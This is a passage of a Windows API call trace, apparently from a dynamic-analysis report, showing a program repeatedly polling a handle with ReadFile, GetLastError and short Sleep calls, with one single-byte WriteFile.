	[0223.674] GetLastError () returned 0x218
	[0223.674] Sleep (dwMilliseconds=0xa) 
	[0223.689] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.689] GetLastError () returned 0x218
	[0223.690] Sleep (dwMilliseconds=0xa) 
	[0223.706] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.706] GetLastError () returned 0x218
	[0223.706] Sleep (dwMilliseconds=0xa) 
	[0223.721] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.721] GetLastError () returned 0x218
	[0223.721] Sleep (dwMilliseconds=0xa) 
	[0223.738] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.738] GetLastError () returned 0x218
	[0223.738] Sleep (dwMilliseconds=0xa) 
	[0223.753] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.753] GetLastError () returned 0x218
	[0223.753] Sleep (dwMilliseconds=0xa) 
	[0223.768] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.768] GetLastError () returned 0x218
	[0223.768] Sleep (dwMilliseconds=0xa) 
	[0223.812] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.812] GetLastError () returned 0x218
	[0223.812] Sleep (dwMilliseconds=0xa) 
	[0223.846] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.846] GetLastError () returned 0x218
	[0223.846] Sleep (dwMilliseconds=0xa) 
	[0223.892] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.892] GetLastError () returned 0x218
	[0223.892] Sleep (dwMilliseconds=0xa) 
	[0223.908] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.908] GetLastError () returned 0x218
	[0223.908] Sleep (dwMilliseconds=0xa) 
	[0223.924] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.924] GetLastError () returned 0x218
	[0223.924] Sleep (dwMilliseconds=0xa) 
	[0223.951] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.951] GetLastError () returned 0x218
	[0223.951] Sleep (dwMilliseconds=0xa) 
	[0223.955] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.955] GetLastError () returned 0x218
	[0223.955] Sleep (dwMilliseconds=0xa) 
	[0223.971] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.971] GetLastError () returned 0x218
	[0223.971] Sleep (dwMilliseconds=0xa) 
	[0223.986] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0223.986] GetLastError () returned 0x218
	[0223.986] Sleep (dwMilliseconds=0xa) 
	[0224.002] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.002] GetLastError () returned 0x218
	[0224.003] Sleep (dwMilliseconds=0xa) 
	[0224.048] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.048] GetLastError () returned 0x218
	[0224.048] Sleep (dwMilliseconds=0xa) 
	[0224.095] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.095] GetLastError () returned 0x218
	[0224.095] Sleep (dwMilliseconds=0xa) 
	[0224.128] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.128] GetLastError () returned 0x218
	[0224.128] Sleep (dwMilliseconds=0xa) 
	[0224.176] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.176] GetLastError () returned 0x218
	[0224.176] Sleep (dwMilliseconds=0xa) 
	[0224.189] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.189] GetLastError () returned 0x218
	[0224.189] Sleep (dwMilliseconds=0xa) 
	[0224.205] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.205] GetLastError () returned 0x218
	[0224.205] Sleep (dwMilliseconds=0xa) 
	[0224.220] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.220] GetLastError () returned 0x218
	[0224.220] Sleep (dwMilliseconds=0xa) 
	[0224.236] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.236] GetLastError () returned 0x218
	[0224.237] Sleep (dwMilliseconds=0xa) 
	[0224.282] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.282] GetLastError () returned 0x218
	[0224.282] Sleep (dwMilliseconds=0xa) 
	[0224.329] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.329] GetLastError () returned 0x218
	[0224.329] Sleep (dwMilliseconds=0xa) 
	[0224.358] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.358] GetLastError () returned 0x218
	[0224.358] Sleep (dwMilliseconds=0xa) 
	[0224.360] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.360] GetLastError () returned 0x218
	[0224.361] Sleep (dwMilliseconds=0xa) 
	[0224.377] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.377] GetLastError () returned 0x218
	[0224.377] Sleep (dwMilliseconds=0xa) 
	[0224.392] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.392] GetLastError () returned 0x218
	[0224.392] Sleep (dwMilliseconds=0xa) 
	[0224.408] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.408] GetLastError () returned 0x218
	[0224.408] Sleep (dwMilliseconds=0xa) 
	[0224.424] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.424] GetLastError () returned 0x218
	[0224.424] Sleep (dwMilliseconds=0xa) 
	[0224.457] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.457] GetLastError () returned 0x218
	[0224.457] Sleep (dwMilliseconds=0xa) 
	[0224.501] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.501] GetLastError () returned 0x218
	[0224.501] Sleep (dwMilliseconds=0xa) 
	[0224.547] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.547] GetLastError () returned 0x218
	[0224.547] Sleep (dwMilliseconds=0xa) 
	[0224.579] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.579] GetLastError () returned 0x218
	[0224.579] Sleep (dwMilliseconds=0xa) 
	[0224.595] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.595] GetLastError () returned 0x218
	[0224.595] Sleep (dwMilliseconds=0xa) 
	[0224.609] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.610] GetLastError () returned 0x218
	[0224.610] Sleep (dwMilliseconds=0xa) 
	[0224.626] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.626] GetLastError () returned 0x218
	[0224.626] Sleep (dwMilliseconds=0xa) 
	[0224.642] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.642] GetLastError () returned 0x218
	[0224.642] Sleep (dwMilliseconds=0xa) 
	[0224.656] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.656] GetLastError () returned 0x218
	[0224.656] Sleep (dwMilliseconds=0xa) 
	[0224.672] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.672] GetLastError () returned 0x218
	[0224.672] Sleep (dwMilliseconds=0xa) 
	[0224.688] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.688] GetLastError () returned 0x218
	[0224.688] Sleep (dwMilliseconds=0xa) 
	[0224.735] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0224.735] GetLastError () returned 0x218
	[0224.735] Sleep (dwMilliseconds=0x3e8) 
	[0225.780] WriteFile (in: hFile=0x240, lpBuffer=0x108f208, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x108f200, lpOverlapped=0x0) returned 0
	[0225.780] Sleep (dwMilliseconds=0xa) 
	[0225.826] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.826] GetLastError () returned 0x218
	[0225.826] Sleep (dwMilliseconds=0xa) 
	[0225.861] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.861] GetLastError () returned 0x218
	[0225.861] Sleep (dwMilliseconds=0xa) 
	[0225.873] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.873] GetLastError () returned 0x218
	[0225.873] Sleep (dwMilliseconds=0xa) 
	[0225.889] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.889] GetLastError () returned 0x218
	[0225.889] Sleep (dwMilliseconds=0xa) 
	[0225.905] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.905] GetLastError () returned 0x218
	[0225.905] Sleep (dwMilliseconds=0xa) 
	[0225.920] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.920] GetLastError () returned 0x218
	[0225.920] Sleep (dwMilliseconds=0xa) 
	[0225.937] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.937] GetLastError () returned 0x218
	[0225.937] Sleep (dwMilliseconds=0xa) 
	[0225.951] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.951] GetLastError () returned 0x218
	[0225.951] Sleep (dwMilliseconds=0xa) 
	[0225.967] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0225.967] GetLastError () returned 0x218
	[0225.967] Sleep (dwMilliseconds=0xa) 
	[0226.046] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.046] GetLastError () returned 0x218
	[0226.046] Sleep (dwMilliseconds=0xa) 
	[0226.138] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.138] GetLastError () returned 0x218
	[0226.138] Sleep (dwMilliseconds=0xa) 
	[0226.229] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.229] GetLastError () returned 0x218
	[0226.229] Sleep (dwMilliseconds=0xa) 
	[0226.498] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.498] GetLastError () returned 0x218
	[0226.498] Sleep (dwMilliseconds=0xa) 
	[0226.513] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.513] GetLastError () returned 0x218
	[0226.513] Sleep (dwMilliseconds=0xa) 
	[0226.840] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.840] GetLastError () returned 0x218
	[0226.840] Sleep (dwMilliseconds=0xa) 
	[0226.887] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.887] GetLastError () returned 0x218
	[0226.887] Sleep (dwMilliseconds=0xa) 
	[0226.931] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.931] GetLastError () returned 0x218
	[0226.931] Sleep (dwMilliseconds=0xa) 
	[0226.938] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.938] GetLastError () returned 0x218
	[0226.938] Sleep (dwMilliseconds=0xa) 
	[0226.949] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.949] GetLastError () returned 0x218
	[0226.950] Sleep (dwMilliseconds=0xa) 
	[0226.965] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.965] GetLastError () returned 0x218
	[0226.965] Sleep (dwMilliseconds=0xa) 
	[0226.981] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.981] GetLastError () returned 0x218
	[0226.981] Sleep (dwMilliseconds=0xa) 
	[0226.997] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0226.997] GetLastError () returned 0x218
	[0226.997] Sleep (dwMilliseconds=0xa) 
	[0227.014] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.014] GetLastError () returned 0x218
	[0227.014] Sleep (dwMilliseconds=0xa) 
	[0227.028] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.028] GetLastError () returned 0x218
	[0227.028] Sleep (dwMilliseconds=0xa) 
	[0227.075] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.075] GetLastError () returned 0x218
	[0227.075] Sleep (dwMilliseconds=0xa) 
	[0227.121] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.121] GetLastError () returned 0x218
	[0227.121] Sleep (dwMilliseconds=0xa) 
	[0227.163] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.163] GetLastError () returned 0x218
	[0227.163] Sleep (dwMilliseconds=0xa) 
	[0227.168] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.168] GetLastError () returned 0x218
	[0227.168] Sleep (dwMilliseconds=0xa) 
	[0227.184] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.184] GetLastError () returned 0x218
	[0227.184] Sleep (dwMilliseconds=0xa) 
	[0227.231] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.232] GetLastError () returned 0x218
	[0227.233] Sleep (dwMilliseconds=0xa) 
	[0227.258] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.258] GetLastError () returned 0x218
	[0227.258] Sleep (dwMilliseconds=0xa) 
	[0227.298] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.298] GetLastError () returned 0x218
	[0227.298] Sleep (dwMilliseconds=0xa) 
	[0227.347] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.347] GetLastError () returned 0x218
	[0227.347] Sleep (dwMilliseconds=0xa) 
	[0227.387] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0227.387] GetLastError () returned 0x218
	[0227.387] Sleep (dwMilliseconds=0xa) 
